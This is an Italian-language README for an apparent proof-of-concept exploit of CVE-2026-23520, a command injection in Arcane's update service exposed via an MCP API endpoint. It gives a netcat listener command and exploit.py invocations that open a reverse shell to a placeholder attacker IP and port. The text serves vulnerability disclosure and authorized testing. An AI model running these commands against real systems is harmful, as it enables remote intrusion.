
Proof-of-concept exploit per CVE-2026-23520, una vulnerabilità di command injection nel servizio di aggiornamento di Arcane, che consente l'esecuzione remota di codice tramite richieste API appositamente formulate.
Questo repository contiene un Proof-of-Concept (PoC) per una vulnerabilità di Esecuzione Remota di Comandi (RCE) che colpisce applicazioni che espongono un endpoint API MCP vulnerabile (comunemente /api/mcp/connect).
La vulnerabilità consente l'esecuzione di comandi a livello di sistema tramite una richiesta API appositamente predisposta.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| Argomento | Descrizione |
|---|---|
| target | IP, dominio o URL del target |
| --lhost | IP dell'attaccante |
| --lport | Porta dell'attaccante |
| Flag | Descrizione |
|---|---|
| -p, --port | Porta del target (default: 443) |
| -s, --scheme | http o https (default: https) |
| -e, --endpoint | Percorso dell'endpoint API |
| -t, --timeout | Timeout della richiesta |
| -v, --verbose | Output di debug |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash sia disponibile.Solo per test autorizzati e scopi educativi.
Parosh B